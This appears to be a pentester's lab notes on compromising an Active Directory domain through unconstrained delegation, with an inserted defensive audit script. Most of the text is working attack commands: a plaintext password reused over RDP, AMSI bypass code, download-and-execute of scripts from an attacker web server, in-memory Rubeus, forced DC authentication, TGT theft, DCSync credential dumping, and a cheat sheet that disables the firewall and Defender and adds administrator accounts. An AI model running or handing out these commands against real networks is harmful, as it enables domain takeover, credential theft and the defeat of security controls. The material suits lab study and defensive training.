Unconstrained delegation
The simplest way to exploit unconstrained delegation is from Windows with Rubeus.
We launch an RDP connection to Bronx.
We got Fernando.Alonzo's password from the DonPAPI dump:
xfreerdp /d:north.newyork.local /u:fernando.alonzo /p:'IDr1R3allyF@sTF1!' /v:192.168.56.11 /size:80% /cert-ignore
From there we will bypass AMSI and launch Rubeus in memory.
Prepare our server hosting Rubeus.exe and our AMSI bypass:
python3 -m http.server 8080
In the RDP session, bypass AMSI.
amsi_rmouse.txt contains the commands below:
# Patching amsi.dll AmsiScanBuffer by rasta-mouse
$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $Win32
$LoadLibrary = [Win32]::LoadLibrary("amsi.dll")
$Address = [Win32]::GetProcAddress($LoadLibrary, "AmsiScanBuffer")
$p = 0
[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, 6)
Download Rubeus.exe to Parrot OS:
wget https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Rubeus.exe
Download and execute amsi_rmouse.txt to bypass AMSI:
$x=[Ref].Assembly.GetType('System.Management.Automation.Am'+'siUt'+'ils');$y=$x.GetField('am'+'siCon'+'text',[Reflection.BindingFlags]'NonPublic,Static');$z=$y.GetValue($null);[Runtime.InteropServices.Marshal]::WriteInt32($z,0x41424344)
(new-object system.net.webclient).downloadstring('http://192.168.56.31:8080/amsi_rmouse.txt')|IEX
Now launch Rubeus in memory with execute-assembly.
First we will list the available tickets:
$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.56.31:8000/Rubeus.exe')
$assem = [System.Reflection.Assembly]::Load($data);
[Rubeus.Program]::MainString("triage");

Now coerce the DC NYC into authenticating to the DC Bronx:
Coercer fuzz -u pablo.sandoval -d north.newyork.local -p baseballpanda -t nyc.newyork.local
Run triage again:
[Rubeus.Program]::MainString("triage")
The TGT of NYC is now present.

To extract it, relaunch Coercer and one second later run the following dump command. (I don't know why, but the Rubeus monitor mode doesn't want to run via execute-assembly.)
[Rubeus.Program]::MainString("dump /user:nyc$ /service:krbtgt /nowrap");

We now have the TGT of the domain controller.
Let's continue on Linux to pass the ticket and launch DCSync with secretsdump:
- copy the ticket without spaces and newlines (in vim I do :%s/\s*\n\s*//g)
- convert the ticket to ccache
- use the Kerberos ticket and launch secretsdump
cat tgt.b64|base64 -d > ticket.kirbi
ticketConverter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=/workspace/unconstrained/ticket.ccache
secretsdump.py -k -no-pass NEWYORK.LOCAL/'NYC$'@NYC
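
As an added defensive check, not part of the original notes, the following PowerShell audits which accounts in the domain carry the TRUSTED_FOR_DELEGATION flag, the setting that lets Bronx capture NYC's TGT above. It assumes the ActiveDirectory RSAT module is available on a domain-joined host.

```powershell
# Added example (not from the original notes): audit unconstrained delegation.
# Requires the ActiveDirectory module (RSAT); run from a domain-joined host.
Import-Module ActiveDirectory

# TRUSTED_FOR_DELEGATION bit in userAccountControl (0x80000 = 524288).
# 1.2.840.113556.1.4.803 is the LDAP bitwise-AND matching rule.
$filter = '(userAccountControl:1.2.840.113556.1.4.803:=524288)'
$props  = 'userAccountControl', 'primaryGroupID', 'servicePrincipalName', 'LastLogonDate'

$computers = Get-ADComputer -LDAPFilter $filter -Properties $props
$users     = Get-ADUser     -LDAPFilter $filter -Properties $props

# Domain controllers always carry this flag and are expected. Their primary
# group is "Domain Controllers" (RID 516) or "Read-only Domain Controllers" (RID 521).
$accounts = @($computers) + @($users) | Where-Object { $_ }

$findings = foreach ($acct in $accounts) {
    $isDC = $acct.primaryGroupID -in 516, 521
    [pscustomobject]@{
        Name      = $acct.SamAccountName
        Type      = $acct.ObjectClass
        IsDC      = $isDC
        Risk      = if ($isDC) { 'expected' } else { 'REVIEW: non-DC with unconstrained delegation' }
        SPNs      = ($acct.servicePrincipalName -join ';')
        LastLogon = $acct.LastLogonDate
    }
}

$findings | Sort-Object IsDC, Name | Format-Table -AutoSize

# Remediation for a confirmed non-DC account is to clear the flag (or move the
# service to constrained / resource-based delegation). Uncomment to apply.
# $findings | Where-Object { -not $_.IsDC } | ForEach-Object {
#     Set-ADAccountControl -Identity $_.Name -TrustedForDelegation $false
# }
```

Any non-DC host flagged as REVIEW is one where a coerced DC authentication, as shown above, would leave a reusable TGT in memory.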

Another way to exploit this is to do a PTT with Rubeus and launch a DCSync with Mimikatz, but this implies running Mimikatz on Bronx and bypassing the Defender AV.
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.56.31:8000/PowerView.ps1', 'C:\Users\Elena.Lopez\Documents\PowerView.ps1')
https://github.com/SolomonSklash/RubeusToCcache
rubeus.exe monitor /targetuser:nyc$ /interval:10
https://github.com/jtmpu/PrecompiledBinaries/blob/master/SpoolSample.exe
SpoolSample.exe nyc bronx
kerberos::ptt C:\Users\fernando.Alonzo\Desktop\DC.kirbi
lsadump::dcsync /domain:newyork.local /user:nyc$
[IO.File]::WriteAllBytes("C:\Users\fernando.Alonzo\Desktop\DC.kirbi", [Convert]::FromBase64String("base64"))
https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20220919
lsadump::lsa /domain:newyork.local /user:nyc$
lsadump::dcsync /user:krbtgt
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation
CMD
#Disable Firewall
powershell -c Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
netsh advfirewall set allprofiles state off
powershell -command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"
Set-MpPreference -DisableRealtimeMonitoring $true
#Change User Password via powershell administrator
Set-ADAccountPassword -Identity $user -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "$newPass" -Force)
#Enable RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
#Create new user
net user username password /ADD
#To add a new user account to the domain:
net user username password /ADD /DOMAIN
#Add user to Admin Group
net localgroup Administrators Tom /add